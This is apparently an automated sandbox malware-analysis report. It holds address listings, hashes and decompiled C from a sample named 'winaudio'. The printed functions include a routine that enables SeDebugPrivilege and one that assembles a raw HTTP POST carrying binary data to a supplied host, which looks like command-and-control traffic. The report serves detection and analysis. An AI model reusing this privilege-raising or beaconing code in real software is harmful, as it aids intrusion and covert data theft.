                        0x002defc4
                        0x002defce
                        0x002defd6
                        0x002defd9
                        0x002defe1
                        0x002defee
                        0x002deffb
                        0x002df006
                        0x002df00b
                        0x002df00d
                        0x002df00f
                        0x002df012
                        0x002df012
                        0x002df01b
                        0x002df0d3
                        0x002df0dc
                        0x002df0e0
                        0x002df0e1
                        0x002df0ee
                        0x002df0f3
                        0x002df0fa
                        0x002df101
                        0x002df108
                        0x002df10d
                        0x002df114
                        0x002df117
                        0x002df11c
                        0x002df121
                        0x002df12e
                        0x002df13b
                        0x002df140
                        0x002df143
                        0x002df145
                        0x002df2f7
                        0x002df2f7
                        0x002df2fa
                        0x002df2fc
                        0x002df303
                        0x002df30a
                        0x002df30e
                        0x002df314
                        0x002df310
                        0x002df310
                        0x002df310
                        0x002df316
                        0x002df318
                        0x002df31e
                        0x002df321
                        0x002df328
                        0x002df32d
                        0x002df331
                        0x002df334
                        0x002df337
                        0x002df33a
                        0x002df36a
                        0x002df36a
                        0x002df371
                        0x002df374
                        0x002df37b
                        0x002df382
                        0x002df386
                        0x002df389
                        0x002df3b9
                        0x002df3b9
                        0x002df3bc
                        0x002df3c0
                        0x00000000
                        0x00000000
                        0x002df3c2
                        0x00000000
                        0x002df3c2
                        0x002df38b
                        0x002df38f
                        0x002df394
                        0x002df3b0
                        0x002df3b1
                        0x002df3b6
                        0x00000000
                        0x002df3b6
                        0x002df396
                        0x002df399
                        0x00000000
                        0x00000000
                        0x002df39b
                        0x002df39e
                        0x002df3a0
                        0x00000000
                        0x00000000
                        0x002df3a2
                        0x002df3a4
                        0x002df3a7
                        0x00000000
                        0x00000000
                        0x002df3a9
                        0x002df3ac
                        0x00000000
                        0x00000000
                        0x002df3ae
                        0x00000000
                        0x002df33c
                        0x002df33c
                        0x002df340
                        0x002df345
                        0x002df361
                        0x002df362
                        0x002df367
                        0x00000000
                        0x002df367
                        0x002df347
                        0x002df34a
                        0x002df3ca
                        0x002df3ca
                        0x00000000
                        0x002df3ca
                        0x002df34c
                        0x002df34f
                        0x002df351
                        0x00000000
                        0x00000000
                        0x002df353
                        0x002df355
                        0x002df358
                        0x00000000
                        0x00000000
                        0x002df35a
                        0x002df35d
                        0x00000000
                        0x00000000
                        0x002df35f
                        0x00000000
                        0x002df35f
                        0x002df33a
                        0x002df14b
                        0x002df14f
                        0x00000000
                        0x00000000
                        0x002df155
                        0x002df158
                        0x002df1de
                        0x002df1e1
                        0x002df1e1
                        0x002df1e3
                        0x002df1e3
                        0x002df1e7
                        0x00000000
                        0x00000000
                        0x002df1ed
                        0x002df1f4
                        0x00000000
                        0x00000000
                        0x002df202
                        0x002df20d
                        0x002df22e
                        0x002df233
                        0x002df236
                        0x002df239
                        0x002df23b
                        0x002df23d
                        0x002df23d
                        0x002df23d
                        0x002df23e
                        0x002df246
                        0x002df249
                        0x002df24f
                        0x002df252
                        0x002df255
                        0x002df25e
                        0x002df264
                        0x002df26a
                        0x002df26c
                        0x002df26e
                        0x002df272
                        0x002df275
                        0x002df27a
                        0x002df27a
                        0x002df272
                        0x002df27d
                        0x002df27e
                        0x002df282
                        0x002df284
                        0x002df287
                        0x002df29b
                        0x002df29e
                        0x002df2a0
                        0x002df2a7
                        0x002df2ae
                        0x002df2b2
                        0x002df2b8
                        0x002df2b4
                        0x002df2b4
                        0x002df2b4
                        0x002df2ba
                        0x002df2bc
                        0x002df2c2
                        0x002df2c5
                        0x002df2cc
                        0x002df2d1
                        0x00000000
                        0x002df2d1
                        0x002df28b
                        0x002df291
                        0x002df293
                        0x00000000
                        0x00000000
                        0x002df299
                        0x00000000
                        0x002df282
                        0x002df2d4
                        0x002df2d7
                        0x002df2e1
                        0x002df2e3
                        0x002df2ea
                        0x002df2ef
                        0x002df2ef
                        0x00000000
                        0x002df2e3
                        0x002df15e
                        0x002df163
                        0x002df165
                        0x002df168
                        0x002df16e
                        0x002df171
                        0x002df17e
                        0x002df183
                        0x002df188
                        0x002df18b
                        0x002df18d
                        0x002df194
                        0x002df19b
                        0x002df19f
                        0x002df1a5
                        0x002df1a1
                        0x002df1a1
                        0x002df1a1
                        0x002df1a9
                        0x002df1b2
                        0x002df1b7
                        0x002df1ba
                        0x002df1bf
                        0x002df1c5
                        0x002df1cd
                        0x002df1d4
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x002df01b
                        0x002defbc
                        0x00000000
                        0x002def40

                        APIs
                        • Sleep.KERNEL32(00000064,847B54EE), ref: 002DEF75
                        • Sleep.KERNEL32(00000032,00000000,00000000,?,?,00000000), ref: 002DF28B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: Sleep
                        • String ID: si-2n*8o_5brl-kq
                        • API String ID: 3472027048-1045541510
                        • Opcode ID: e5e51a2889135f1b500d8faff478e9eb079df7372254c01668333a28a88266af
                        • Instruction ID: 3d22ed4218b1d67b1e41e7591315e2c20f374172350beb8802f992aeeafd176c
                        • Opcode Fuzzy Hash: e5e51a2889135f1b500d8faff478e9eb079df7372254c01668333a28a88266af
                        • Instruction Fuzzy Hash: 23E124709202888BEF59DFA4C9957AEBBB8EB05304F14057BD403AB3C2D7748D95CB95
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0039247D Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE
                        Download Yara Rule
                        C-Code - Quality: 93%
                        			E0039247D(void* __ebx, signed int __edx, void* __edi, signed int _a4, void* _a8, signed int _a12) {
				signed int _v8;
				long _v12;
				struct _OVERLAPPED* _v16;
				long _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _v52;
				void* __esi;
				signed int _t62;
				intOrPtr _t66;
				signed char _t68;
				signed int _t69;
				signed int _t71;
				signed int _t73;
				signed int _t74;
				signed int _t77;
				intOrPtr _t79;
				signed int _t87;
				signed int _t89;
				signed int _t90;
				signed int _t106;
				signed int _t107;
				signed int _t110;
				intOrPtr _t112;
				signed int _t117;
				signed int _t119;
				void* _t121;
				signed int _t123;
				signed int _t124;
				void* _t125;

				_t119 = __edx;
				_t62 =  *0x3e1008; // 0x847b54ee
				_v8 = _t62 ^ _t124;
				_t110 = _a12;
				_v12 = _t110;
				_t123 = _a4;
				_t121 = _a8;
				_v52 = _t121;
				if(_t110 != 0) {
					__eflags = _t121;
					if(_t121 != 0) {
						_push(__ebx);
						_t106 = _t123 >> 6;
						_t119 = (_t123 & 0x0000003f) * 0x30;
						_v32 = _t106;
						_t66 =  *((intOrPtr*)(0x3f0290 + _t106 * 4));
						_v48 = _t66;
						_v28 = _t119;
						_t107 =  *((intOrPtr*)(_t66 + _t119 + 0x29));
						__eflags = _t107 - 2;
						if(_t107 == 2) {
							L6:
							_t68 =  !_t110;
							__eflags = _t68 & 0x00000001;
							if((_t68 & 0x00000001) != 0) {
								_t66 = _v48;
								L9:
								__eflags =  *(_t66 + _t119 + 0x28) & 0x00000020;
								if(__eflags != 0) {
									E0038C043(_t123, 0, 0, 2);
									_t125 = _t125 + 0x10;
								}
								_t69 = E00392022(_t107, _t119, __eflags, _t123);
								__eflags = _t69;
								if(_t69 == 0) {
									_t112 =  *((intOrPtr*)(0x3f0290 + _v32 * 4));
									_t71 = _v28;
									__eflags =  *(_t112 + _t71 + 0x28) & 0x00000080;
									if(( *(_t112 + _t71 + 0x28) & 0x00000080) == 0) {
										_v24 = 0;
										_v20 = 0;
										_v16 = 0;
										_t73 = WriteFile( *(_t112 + _t71 + 0x18), _t121, _v12,  &_v20, 0);
										__eflags = _t73;
										if(_t73 == 0) {
											_v24 = GetLastError();
										}
										_t123 =  &_v24;
										goto L28;
									}
									_t87 = _t107;
									__eflags = _t87;
									if(_t87 == 0) {
										_t89 = E00392098(_t107, _t121,  &_v24, _t123, _t121, _v12); // executed
										goto L17;
									}
									_t90 = _t87 - 1;
									__eflags = _t90;
									if(_t90 == 0) {
										_t89 = E00392265(_t107, _t121,  &_v24, _t123, _t121, _v12);
										goto L17;
									}
									__eflags = _t90 != 1;
									if(_t90 != 1) {
										goto L34;
									}
									_t89 = E00392177(_t107, _t121,  &_v24, _t123, _t121, _v12);
									goto L17;
								} else {
									__eflags = _t107;
									if(_t107 == 0) {
										_t89 = E00391E02(_t107, _t121,  &_v24, _t123, _t121, _v12);
										L17:
										L15:
										_t123 = _t89;
										L28:
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t74 = _v40;
										__eflags = _t74;
										if(_t74 != 0) {
											__eflags = _t74 - _v36;
											L40:
											L41:
											return E002E056D(_v8 ^ _t124, _t119, _t123);
										}
										_t77 = _v44;
										__eflags = _t77;
										if(_t77 == 0) {
											_t121 = _v52;
											L34:
											_t117 = _v28;
											_t79 =  *((intOrPtr*)(0x3f0290 + _v32 * 4));
											__eflags =  *(_t79 + _t117 + 0x28) & 0x00000040;
											if(( *(_t79 + _t117 + 0x28) & 0x00000040) == 0) {
												L37:
												 *((intOrPtr*)(E00380E9E())) = 0x1c;
												_t81 = E00380E8B();
												 *_t81 =  *_t81 & 0x00000000;
												__eflags =  *_t81;
												L38:
												goto L40;
											}
											__eflags =  *_t121 - 0x1a;
											if( *_t121 != 0x1a) {
												goto L37;
											}
											goto L40;
										}
										_t123 = 5;
										__eflags = _t77 - _t123;
										if(_t77 != _t123) {
											_t81 = E00380E68(_t77);
										} else {
											 *((intOrPtr*)(E00380E9E())) = 9;
											 *(E00380E8B()) = _t123;
										}
										goto L38;
									}
									__eflags = _t107 - 1 - 1;
									if(_t107 - 1 > 1) {
										goto L34;
									}
									_t89 = E00391FB5( &_v24, _t121, _v12);
									goto L15;
								}
							}
							 *(E00380E8B()) =  *_t97 & 0x00000000;
							 *((intOrPtr*)(E00380E9E())) = 0x16;
							_t81 = E0037F971();
							goto L38;
						}
						__eflags = _t107 - 1;
						if(_t107 != 1) {
							goto L9;
						}
						goto L6;
					}
					 *(E00380E8B()) =  *_t99 & _t121;
					 *((intOrPtr*)(E00380E9E())) = 0x16;
					E0037F971();
					goto L41;
				}
				goto L41;
			}






































                        0x0039247d
                        0x00392485
                        0x0039248c
                        0x0039248f
                        0x00392492
                        0x00392496
                        0x0039249a
                        0x0039249d
                        0x003924a2
                        0x003924ab
                        0x003924ad
                        0x003924ce
                        0x003924d3
                        0x003924d9
                        0x003924dc
                        0x003924df
                        0x003924e6
                        0x003924e9
                        0x003924ec
                        0x003924f0
                        0x003924f3
                        0x003924fa
                        0x003924fc
                        0x003924fe
                        0x00392500
                        0x0039251f
                        0x00392522
                        0x00392522
                        0x00392527
                        0x00392530
                        0x00392535
                        0x00392535
                        0x00392539
                        0x0039253f
                        0x00392541
                        0x0039257f
                        0x00392586
                        0x00392589
                        0x0039258e
                        0x003925dd
                        0x003925e0
                        0x003925e3
                        0x003925ef
                        0x003925f5
                        0x003925f7
                        0x003925ff
                        0x003925ff
                        0x00392602
                        0x00000000
                        0x00392602
                        0x00392593
                        0x00392593
                        0x00392596
                        0x003925cf
                        0x00000000
                        0x003925cf
                        0x00392598
                        0x00392598
                        0x0039259b
                        0x003925bf
                        0x00000000
                        0x003925bf
                        0x0039259d
                        0x003925a0
                        0x00000000
                        0x00000000
                        0x003925af
                        0x00000000
                        0x00392543
                        0x00392543
                        0x00392545
                        0x00392572
                        0x00392577
                        0x00392562
                        0x00392562
                        0x00392605
                        0x00392608
                        0x00392609
                        0x0039260a
                        0x0039260b
                        0x0039260e
                        0x00392610
                        0x00392675
                        0x00392678
                        0x00392679
                        0x00392688
                        0x00392688
                        0x00392612
                        0x00392615
                        0x00392617
                        0x0039263d
                        0x00392640
                        0x00392643
                        0x00392646
                        0x0039264d
                        0x00392652
                        0x0039265d
                        0x00392662
                        0x00392668
                        0x0039266d
                        0x0039266d
                        0x00392670
                        0x00000000
                        0x00392670
                        0x00392654
                        0x00392657
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00392659
                        0x0039261b
                        0x0039261c
                        0x0039261e
                        0x00392635
                        0x00392620
                        0x00392625
                        0x00392630
                        0x00392630
                        0x00000000
                        0x0039261e
                        0x00392549
                        0x0039254c
                        0x00000000
                        0x00000000
                        0x0039255a
                        0x00000000
                        0x0039255f
                        0x00392541
                        0x00392507
                        0x0039250f
                        0x00392515
                        0x00000000
                        0x00392515
                        0x003924f5
                        0x003924f8
                        0x00000000
                        0x00000000
                        0x00000000
                        0x003924f8
                        0x003924b4
                        0x003924bb
                        0x003924c1
                        0x00000000
                        0x003924c6
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: db0c1993c75ec857454c157fab31495bbdabe2cf147b735468329286f96db4b6
                        • Instruction ID: c6bb75a7c9a5c98233406934afaaa7a7d56478eb839661594037b8e43804fe69
                        • Opcode Fuzzy Hash: db0c1993c75ec857454c157fab31495bbdabe2cf147b735468329286f96db4b6
                        • Instruction Fuzzy Hash: 6F51A171D00A0ABBCF27EFA9D845FAFBBB8AF46310F110559E404AB691D770A941CB61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002D0D80 Relevance: 4.6, APIs: 3, Instructions: 128COMMON
                        Download Yara Rule
                        C-Code - Quality: 94%
                        			E002D0D80(signed int __ecx, signed int _a4, intOrPtr _a8) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t32;
				signed int _t35;
				void* _t38;
				signed int _t39;
				intOrPtr _t40;
				signed int _t41;
				signed int _t42;
				intOrPtr _t43;
				signed char _t46;
				intOrPtr _t49;
				unsigned int _t54;
				signed int _t55;
				unsigned int _t60;
				signed char _t63;
				void* _t64;
				signed int _t65;
				signed int _t71;
				signed int _t74;
				signed int _t76;
				void* _t77;
				intOrPtr _t78;

				_push(0xffffffff);
				_push(0x39c240);
				_push( *[fs:0x0]);
				_t78 = _t77 - 0xc;
				_t32 =  *0x3e1008; // 0x847b54ee
				_push(_t32 ^ _t76);
				 *[fs:0x0] =  &_v16;
				_v20 = _t78;
				_t74 = __ecx;
				_v24 = __ecx;
				_t35 = _a4;
				_t71 = _t35 | 0x0000000f;
				if(_t71 <= 0xfffffffe) {
					_t54 =  *(__ecx + 0x14);
					_t60 = _t54 >> 1;
					_t67 = 0xaaaaaaab * _t71 >> 0x20 >> 1;
					__eflags = _t60 - 0xaaaaaaab * _t71 >> 0x20 >> 1;
					if(__eflags > 0) {
						_t71 = _t60 + _t54;
						__eflags = _t54 - 0xfffffffe - _t60;
						if(__eflags > 0) {
							_t71 = 0xfffffffe;
						}
					}
				} else {
					_t71 = _t35;
				}
				_t11 = _t71 + 1; // 0xffffffff
				_t38 = _t11;
				_v8 = 0;
				if(_t38 != 0) {
					__eflags = _t38 - 0x1000;
					if(__eflags < 0) {
						_t39 = E002E057E(_t67, _t74, __eflags, _t38); // executed
						_t78 = _t78 + 4;
						_t55 = _t39;
					} else {
						_t66 = _t38 + 0x23;
						__eflags = _t38 + 0x23 - _t38;
						if(__eflags <= 0) {
							E002E0503(__eflags);
						}
						_t49 = E002E057E(_t67, _t74, __eflags, _t66);
						_t78 = _t78 + 4;
						_t14 = _t49 + 0x23; // 0x23
						_t55 = _t14 & 0xffffffe0;
						 *((intOrPtr*)(_t55 - 4)) = _t49;
					}
				} else {
					_t55 = 0;
				}
				_t40 = _a8;
				if(_t40 != 0) {
					if( *(_t74 + 0x14) < 0x10) {
						_t65 = _t74;
					} else {
						_t65 =  *_t74;
					}
					if(_t40 != 0) {
						E0037E340(_t55, _t65, _t40);
						_t78 = _t78 + 0xc;
					}
				}
				_t41 =  *(_t74 + 0x14);
				if(_t41 >= 0x10) {
					_t63 =  *_t74;
					if(_t41 + 1 >= 0x1000) {
						_t87 = _t63 & 0x0000001f;
						if((_t63 & 0x0000001f) != 0) {
							E0037F981(_t55, _t63, _t71, _t87);
						}
						_t46 =  *(_t63 - 4);
						_t88 = _t46 - _t63;
						if(_t46 >= _t63) {
							_t46 = E0037F981(_t55, _t63, _t71, _t88);
						}
						_t64 = _t63 - _t46;
						_t89 = _t64 - 4;
						if(_t64 < 4) {
							_t46 = E0037F981(_t55, _t64, _t71, _t89);
						}
						_t90 = _t64 - 0x23;
						if(_t64 > 0x23) {
							_t46 = E0037F981(_t55, _t64, _t71, _t90);
						}
						_t63 = _t46;
					}
					L002E05B1(_t63);
				}
				 *(_t74 + 0x14) = 0xf;
				 *((intOrPtr*)(_t74 + 0x10)) = 0;
				if( *(_t74 + 0x14) < 0x10) {
					_t42 = _t74;
				} else {
					_t42 =  *_t74;
				}
				 *_t42 = 0;
				_t43 = _a8;
				 *_t74 = _t55;
				 *(_t74 + 0x14) = _t71;
				 *((intOrPtr*)(_t74 + 0x10)) = _t43;
				if( *(_t74 + 0x14) >= 0x10) {
					_t74 = _t55;
				}
				 *((char*)(_t74 + _t43)) = 0;
				 *[fs:0x0] = _v16;
				return _t43;
			}
































                        0x002d0d83
                        0x002d0d85
                        0x002d0d90
                        0x002d0d91
                        0x002d0d97
                        0x002d0d9e
                        0x002d0da2
                        0x002d0da8
                        0x002d0dab
                        0x002d0dad
                        0x002d0db0
                        0x002d0db5
                        0x002d0dbb
                        0x002d0dc1
                        0x002d0dcd
                        0x002d0dcf
                        0x002d0dd1
                        0x002d0dd3
                        0x002d0dda
                        0x002d0ddf
                        0x002d0de1
                        0x002d0de3
                        0x002d0de3
                        0x002d0de1
                        0x002d0dbd
                        0x002d0dbd
                        0x002d0dbd
                        0x002d0de8
                        0x002d0de8
                        0x002d0deb
                        0x002d0df4
                        0x002d0dfa
                        0x002d0dff
                        0x002d0e22
                        0x002d0e27
                        0x002d0e2a
                        0x002d0e01
                        0x002d0e01
                        0x002d0e04
                        0x002d0e06
                        0x002d0e08
                        0x002d0e08
                        0x002d0e0e
                        0x002d0e13
                        0x002d0e16
                        0x002d0e19
                        0x002d0e1c
                        0x002d0e1c
                        0x002d0df6
                        0x002d0df6
                        0x002d0df6
                        0x002d0e57
                        0x002d0e5c
                        0x002d0e62
                        0x002d0e68
                        0x002d0e64
                        0x002d0e64
                        0x002d0e64
                        0x002d0e6c
                        0x002d0e71
                        0x002d0e76
                        0x002d0e76
                        0x002d0e6c
                        0x002d0e79
                        0x002d0e7f
                        0x002d0e81
                        0x002d0e89
                        0x002d0e8b
                        0x002d0e8e
                        0x002d0e90
                        0x002d0e90
                        0x002d0e95
                        0x002d0e98
                        0x002d0e9a
                        0x002d0e9c
                        0x002d0e9c
                        0x002d0ea1
                        0x002d0ea3
                        0x002d0ea6
                        0x002d0ea8
                        0x002d0ea8
                        0x002d0ead
                        0x002d0eb0
                        0x002d0eb2
                        0x002d0eb2
                        0x002d0eb7
                        0x002d0eb7
                        0x002d0eba
                        0x002d0ebf
                        0x002d0ec2
                        0x002d0ecd
                        0x002d0ed4
                        0x002d0eda
                        0x002d0ed6
                        0x002d0ed6
                        0x002d0ed6
                        0x002d0edc
                        0x002d0edf
                        0x002d0ee2
                        0x002d0ee4
                        0x002d0eeb
                        0x002d0eee
                        0x002d0ef0
                        0x002d0ef0
                        0x002d0ef2
                        0x002d0ef9
                        0x002d0f07

                        APIs
                        • Concurrency::cancel_current_task.LIBCPMT ref: 002D0E08
                          • Part of subcall function 002E0503: __CxxThrowException@8.LIBVCRUNTIME ref: 002E051A
                        • new.LIBCMT ref: 002D0E0E
                        • new.LIBCMT ref: 002D0E22
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: Concurrency::cancel_current_taskException@8Throw
                        • String ID:
                        • API String ID: 3598223435-0
                        • Opcode ID: 694e6070bea968f02d8575cbeb004fe9c92ed0757063c68a25201531c0c03572
                        • Instruction ID: 323dbe085c9df61632cd14b1b89e69bd4870a2b902d4f5575deacdc81d1977d8
                        • Opcode Fuzzy Hash: 694e6070bea968f02d8575cbeb004fe9c92ed0757063c68a25201531c0c03572
                        • Instruction Fuzzy Hash: 79411471A242419FD7249F68D8C072EB7E9EB05310F500E2EE496CB391D7B1AD64CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 002D7700 Relevance: 4.5, APIs: 3, Instructions: 28COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E002D7700(void* __ecx) {
				void* _v8;
				int _t7;
				signed int _t8;
				signed int _t10;
				int _t14;
				void* _t18;

				_v8 = 0;
				_t7 = OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
				if(_t7 != 0) {
					_t8 =  *0x3ebb6c; // 0x0
					_t10 =  >  ? 0 : _t8 + 2;
					 *0x3ebb6c = _t10;
					 *0x3f0830 = _t10 & 0x00000019 | 0x000000e0; // executed
					E002D7140(_v8, _t18); // executed
					_t14 = FindCloseChangeNotification(_v8); // executed
					return _t14;
				}
				return _t7;
			}









                        0x002d7707
                        0x002d7718
                        0x002d7720
                        0x002d7722
                        0x002d7731
                        0x002d7737
                        0x002d7744
                        0x002d7749
                        0x002d7751
                        0x00000000
                        0x002d7751
                        0x002d775a

                        APIs
                        • GetCurrentProcess.KERNEL32(00000028,00000000), ref: 002D7711
                        • OpenProcessToken.ADVAPI32(00000000), ref: 002D7718
                          • Part of subcall function 002D7140: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 002D7182
                          • Part of subcall function 002D7140: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000002,00000010,00000000,00000000), ref: 002D71CB
                        • FindCloseChangeNotification.KERNEL32(00000000), ref: 002D7751
                        Memory Dump Source
                        • Source File: 00000000.00000002.508009909.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.507983807.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508009909.00000000003FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508826340.0000000000406000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.508833220.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_winaudio.jbxd
                        Similarity
                        • API ID: ProcessToken$AdjustChangeCloseCurrentFindLookupNotificationOpenPrivilegePrivilegesValue
                        • String ID:
                        • API String ID: 4140947299-0
                        • Opcode ID: 80cf44e66780c050e7a1dd59699287d25b57a359f325b07e3bb58323ca50a563
                        • Instruction ID: a866f5ad5799aa9bfa7bdc3b22029abd82cfaf8e84c8ea0427207bc28e2ed02d
                        • Opcode Fuzzy Hash: 80cf44e66780c050e7a1dd59699287d25b57a359f325b07e3bb58323ca50a563
                        • Instruction Fuzzy Hash: EAF08C70910108EBEB12DFA2DC4AB9EBBACEB04304F0045AAE809D33A0DB799D00CA54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0037B9D0 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 166COMMON
                        Download Yara Rule
                        C-Code - Quality: 76%
                        			E0037B9D0(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a28, intOrPtr* _a32) {
				signed int _v8;
				char _v1032;
				intOrPtr _v1036;
				intOrPtr* _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				intOrPtr _v1060;
				signed int _t41;
				void* _t49;
				signed int _t50;
				signed int _t59;
				signed int _t67;
				void* _t83;
				signed int _t84;
				signed int _t90;
				void* _t91;
				signed int _t107;
				signed int _t108;
				intOrPtr* _t109;
				void* _t111;
				void* _t112;
				void* _t113;
				signed int _t115;

				_t103 = __edx;
				_t83 = __ebx;
				_t41 =  *0x3e1008; // 0x847b54ee
				_v8 = _t41 ^ _t115;
				_v1036 = _a4;
				_v1056 = _a12;
				_v1044 = _a16;
				_v1052 = _a20;
				_v1048 = _a28;
				_push(0x1000);
				_v1060 = __ecx;
				_v1040 = _a32;
				_t49 = E00380789(__ecx);
				_t105 = _t49;
				if(_t49 != 0) {
					_t50 = _a24;
					_push(__esi);
					_t90 = _t50 & 0x80000007;
					__eflags = _t90;
					if(__eflags < 0) {
						_t90 = (_t90 - 0x00000001 | 0xfffffff8) + 1;
						__eflags = _t90;
					}
					_t107 = _t50;
					if(__eflags != 0) {
						_t107 = _t107 - _t90 + 8;
						__eflags = _t107;
					}
					_push(_t83);
					_push(_t107);
					 *0x3ee038 = 0;
					_t84 = E00380789(_t90);
					__eflags = _t84;
					if(_t84 != 0) {
						E0037E1A0(_t105, _t84, 0, _t107);
						_t108 = _a24;
						E0037A830(_t84, _t108, _v1052, _t108);
						E003798F0(_t84, _t105, _t84, _v1044, _t108);
						 *0x3ee038 = 0x6f97;
						E0037E1A0(_t105,  &_v1032, 0, 0x400);
						wsprintfA( &_v1032, "POST %s HTTP/1.1\r\nConnection:close\r\nAccept-Language:utf-8\r\nContent-Length:%d\r\nContent-Type:application/octet-stream charset=utf-8\r\nhost:%s\r\nUser-Agent:Mozilla/5.0\r\n\r\n", _v1056, _t108, _v1036);
						_t109 =  &_v1032;
						_t91 = _t109 + 1;
						do {
							_t59 =  *_t109;
							_t109 = _t109 + 1;
							__eflags = _t59;
						} while (_t59 != 0);
						E0037E1A0(_t105, _t105, 0, 0x1000);
						E0037E340(_t105,  &_v1032, _t109 - _t91);
						E0037E340(_t109 - _t91 + _t105, _t84, _a24);
						_t67 = E0037B7E0(_t84, _t103, _t105, _v1036, _a8, _t105, _a24 + _t109 - _t91, _v1048, _v1040); // executed
						__eflags = _t67;
						if(_t67 != 0) {
							 *0x3ee038 = 0;
							E00379680(_t84, _t105, _v1048, _v1044,  *_v1040);
							L00380508(_t105);
							L00380508(_t84);
							__eflags = _v8 ^ _t115;
							_pop(_t111);
							return E002E056D(_v8 ^ _t115, _t103, _t111);
						} else {
							L00380508(_t105);
							L00380508(_t84);
							_pop(_t112);
							__eflags = _v8 ^ _t115;
							return E002E056D(_v8 ^ _t115, _t103, _t112);
						}
					} else {
						L00380508(_t105);
						_pop(_t113);
						__eflags = _v8 ^ _t115;
						return E002E056D(_v8 ^ _t115, _t103, _t113);
					}
				} else {
					return E002E056D(_v8 ^ _t115, __edx, __esi);
				}
			}




























                        0x0037b9d0
                        0x0037b9d0
                        0x0037b9d9
                        0x0037b9e0
                        0x0037b9e6
                        0x0037b9ef
                        0x0037b9f8
                        0x0037ba01
                        0x0037ba0b
                        0x0037ba14
                        0x0037ba19
                        0x0037ba1f
                        0x0037ba25
                        0x0037ba2a
                        0x0037ba31
                        0x0037ba46
                        0x0037ba4b
                        0x0037ba4c
                        0x0037ba4c
                        0x0037ba52
                        0x0037ba58
                        0x0037ba58
                        0x0037ba58
                        0x0037ba59
                        0x0037ba5b
                        0x0037ba5f
                        0x0037ba5f
                        0x0037ba5f
                        0x0037ba62
                        0x0037ba63
